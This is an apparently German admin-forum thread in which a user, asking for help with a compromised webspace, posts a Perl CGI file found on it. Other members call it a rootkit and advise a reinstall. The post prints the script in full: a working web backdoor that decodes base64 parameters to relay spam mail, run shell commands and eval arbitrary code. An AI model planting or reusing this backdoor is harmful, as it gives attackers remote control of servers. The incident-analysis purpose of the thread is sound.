Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Analyse von Schadcode auf Webspace

Frage Sicherheit Erkennung und -Abwehr

Mitglied: mercuric

mercuric (Level 1) - Jetzt verbinden

16.07.2014, aktualisiert 22:09 Uhr, 1357 Aufrufe, 6 Kommentare

Moin,
ich habe gerade die Anfrage bekommen mir einen Webspace anzusehen, dessen Betreiber ein Abuse-Warning vom Provider bekommen hat.
Ich habe im Webverzeichnis unter /www/cgi-bin/ die Datei debris.pl mit folgenden Inhalt gefunden
(hab es leider nicht vernünftig formatiert bekommen)

01.
#!/usr/bin/perl -w 
02.
use strict;sub b ($) {local($^W)=0;use integer;my $s=shift;$s=~tr|A-Za-z0-9+=/||cd;return "" if length($s) % 4;$s=~s/=+$//;$s=~tr|A-Za-z0-9+/| -_|;return "" if !length $s;my $u="";my($i,$l);$l=length($s)-60;for($i=0;$i<=$l;$i+=60){$u.="M".substr($s,$i,60);}$s=substr($s,$i);if($s ne ""){$u.=chr(32+length($s)*3/4).$s;}return unpack("u",$u);}sub m {my $r=30128+256;my $q={};my $s="";if($ENV{REQUEST_METHOD} eq "GET"){$s=$ENV{QUERY_STRING};}else{my $l=$ENV{CONTENT_LENGTH};exit unless $l;while($l > length $s){my $v=length $s;sysread(STDIN,$s,($l-$v),$v);}}foreach(split(/&/,$s)){my($k,$v)=split(/=/,$_,2);next if !defined $k || !length $k;$v="" if !defined $v;$v=~tr/+/ /;$v=~s/%([0-9A-Fa-f]{2})/chr(hex($1))/esg;$q->{$k}=$v;}print "Content-type: text/html; charset=iso-8859-1\x0D\x0A\x0D\x0A";if($q->{m}==0){print $r;exit;}if($q->{m}==1){if(open(M,"| /usr/sbin/sendmail -t > /dev/null")){print M sprintf("To: %s\x0D\x0ASubject: %s\x0D\x0A%s",&b($q->{a}),&b($q->{b}),&b($q->{c}));close M;print $r;}exit;}if($q->{m}==2){use IPC::Open2 qw(open2);local $SIG{PIPE}=sub {exit};my($o,$i);my $p=open2 $o,$i,&b($q->{a});print $i &b($q->{b});close $i;print while(<$o>);close $o;waitpid($p,0);exit;}if($q->{m}==3){eval(&b($q->{a}));exit;}}&m();
Hab jetzt noch nicht so viele Perl Skripte gesehen, aber es sieht für mich aus, als würden damit (Spam)-Mails verschickt.
Liege ich da mit richtig? Kann mir noch jemand mehr dazu sagen?
In den Logfiles ist zu sehen, dass auf die Datei regelmäßig von IP-Adressen aus verschieden Ländern zugegriffen wurde.
Würdet Ihr sagen, dass es reicht das Skript zu entfernen (und natürlich alles Login Daten zu ändern) oder gibt es in dem Code Hinweise, dass es noch mehr korrupte Files gibt?

Vielen Dank für eure Mühe
mercuric
Mitglied: colinardo
LÖSUNG 16.07.2014, aktualisiert um 22:09 Uhr
Hallo mercuric,
da haben die sich ein Rootkit eingefangen. Hatte vor ein paar Tagen ein ähnliches System das komplett kompromittiert war (OpenSSH Sicherheitslücke). Bei diesem System wurden diverse Veränderungen vorgenommen um den Server auch nach einem Reboot immer wieder zu infizieren.

Neuinstallation ist in diesem Fall unbedingt anzuraten !

Hier noch ein Link dazu:
http://security.stackexchange.com/questions/10202/perl-script-rootkit-e ...

Wenn es ein Managed Server ist, ist vermutlich nur die Seite bzw. das CMS infiziert. Hier sind dann sämtliche Seiten auf Veränderungen zu überprüfen, oder auch dieses neu einzuspielen.

Grüße Uwe
Bitte warten ..
Mitglied: mercuric
16.07.2014 um 21:48 Uhr
Vielen Dank für deine schnelle Antwort, dass ja schon mal sehr spannend.
Es handelt sich lediglich um Webspace, sprich FTP, MySQL und Mail Zugang nicht um einen Root-Server (1blu-Homepage Professional).
Auf dem Space liegen nur reine HTML-Files, die auf dem ersten Blick sauber aussehen und Images/PDFs.
Ist es auch möglich so einem abgeschotteten System weiter zu kompromittieren?
Bitte warten ..
Mitglied: colinardo
16.07.2014, aktualisiert um 22:12 Uhr
Wenn nicht alle Sicherheitspatches eingespielt wurden oder eine Erweiterung des Hosters Sicherheitslücken aufweist, kann das schon mal sein, zwar selten, aber nicht unmöglich. Checke trotzdem alle Seiten auch auf komprimiertes JavaScript.
http://www.administrator.de/forum/opera-browser-warnung-vor-einer-b&oum ...
Bitte warten ..
Mitglied: certifiedit.net
16.07.2014 um 22:11 Uhr
..und kontaktiere den Hoster.
Bitte warten ..
Mitglied: LordGurke
17.07.2014 um 21:06 Uhr
Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
Bitte warten ..
Mitglied: colinardo
17.07.2014, aktualisiert um 21:09 Uhr
Zitat von LordGurke:

Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
hab nicht gesagt das die aktuell war der Betreiber hat das betroffene System ziemlich vernachlässigt...
Bitte warten ..
Ähnliche Inhalte
Viren und Trojaner
Analyse einer Spammail mit Schadcode (3)

Link von Knorkator zum Thema Viren und Trojaner ...

LAN, WAN, Wireless
gelöst Netzwerk Analyse (9)

Frage von Tooobii zum Thema LAN, WAN, Wireless ...

Neue Wissensbeiträge
Viren und Trojaner

Neues Botnetz über IoT-Geräte

Information von certifiedit.net zum Thema Viren und Trojaner ...

Ubuntu

Ubuntu 17.10 steht zum Download bereit

(3)

Information von Frank zum Thema Ubuntu ...

Datenschutz

Autofahrer-Pranger - Bewertungsportal illegal

(8)

Information von BassFishFox zum Thema Datenschutz ...

Windows 10

Neues Win10 Funktionsupdate verbuggt RemoteApp

(8)

Information von thomasreischer zum Thema Windows 10 ...

Heiß diskutierte Inhalte
Router & Routing
Externe IP von innen erreichbar machen (15)

Frage von Windows10Gegner zum Thema Router & Routing ...

Windows Installation
Windows 10 neu installieren (12)

Frage von imebro zum Thema Windows Installation ...

Windows Server
Frage zu Server Rack (11)

Frage von rainergugus zum Thema Windows Server ...